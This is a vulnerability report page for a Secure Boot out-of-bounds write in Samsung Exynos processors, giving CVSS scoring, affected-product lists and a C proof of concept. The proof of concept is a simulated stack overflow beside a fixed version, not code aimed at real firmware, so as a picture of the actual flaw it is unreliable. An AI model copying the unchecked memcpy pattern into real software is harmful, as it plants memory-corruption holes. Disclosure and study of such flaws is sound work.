Security Vulnerability Report
CVE-2025-27374 CVSS 5.3 MEDIUM

Published: 2025-11-04 21:15:37
Last Modified: 2025-11-07 13:00:04

Description

An issue was discovered in the Secure Boot component in Samsung Mobile Processor and Wearable Processor Exynos 9820, 9825, 980, 990, 850, 1080, 1280, 2200, 1330, 1380, 1480, 2400. The lack of a length check leads to out-of-bounds writes.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_9825_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_9825:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_9820_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_9820:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:* - NOT VULNERABLE
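Samsung Exynos 9820 < security patch version
Samsung Exynos 9825 < security patch version
Samsung Exynos 980 < security patch version
Samsung Exynos 990 < security patch version
Samsung Exynos 850 < security patch version
Samsung Exynos 1080 < security patch version
Samsung Exynos 1280 < security patch version
Samsung Exynos 2200 < security patch version
Samsung Exynos 1330 < security patch version
Samsung Exynos 1380 < security patch version
Samsung Exynos 1480 < security patch version
Samsung Exynos 2400 < security patch version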

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-27374 PoC - Secure Boot Length Check Bypass
// This PoC demonstrates the concept of the vulnerability
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>   // malloc, free
#include <string.h>

// Simulated Secure Boot header structure
typedef struct {
    uint32_t magic;
    uint32_t image_size;
    uint32_t load_address;
    uint32_t entry_point;
    uint8_t signature[256];
    uint8_t* image_data;
} secure_boot_header_t;

// Vulnerable function - missing length check
void load_secure_image(secure_boot_header_t* header) {
    uint8_t buffer[1024];
    // VULNERABILITY: Missing boundary check on image_size
    // Should check: if (header->image_size > sizeof(buffer))
    memcpy(buffer, header->image_data, header->image_size);
    // If image_size > 1024, this causes OOB write
}

// Secure version with proper validation
void load_secure_image_fixed(secure_boot_header_t* header) {
    uint8_t buffer[1024];
    // FIX: Proper length check before copy
    if (header->image_size > sizeof(buffer)) {
        printf("[-] Error: Image size exceeds buffer boundary\n");
        return;
    }
    memcpy(buffer, header->image_data, header->image_size);
    printf("[+] Secure image loaded successfully\n");
}

// Exploit demonstration
int main(void) {
    printf("[*] CVE-2025-27374 PoC - Secure Boot OOB Write\n");

    // Create malicious header with oversized image_size
    secure_boot_header_t malicious_header = {0};
    malicious_header.magic = 0xDEADBEEF;
    malicious_header.image_size = 2048;  // Exceeds buffer size (1024)
    malicious_header.load_address = 0x10000;
    malicious_header.entry_point = 0x10000;

    // Allocate oversized data
    malicious_header.image_data = (uint8_t*)malloc(2048);
    if (malicious_header.image_data == NULL) {
        return 1;  // allocation failed
    }
    memset(malicious_header.image_data, 0x41, 2048);

    printf("[*] Triggering vulnerable load function...\n");
    load_secure_image(&malicious_header);  // OOB write occurs

    printf("[+] PoC demonstrates buffer overflow in Secure Boot\n");
    printf("[*] Mitigation: Apply Samsung security update\n");

    free(malicious_header.image_data);
    return 0;
}
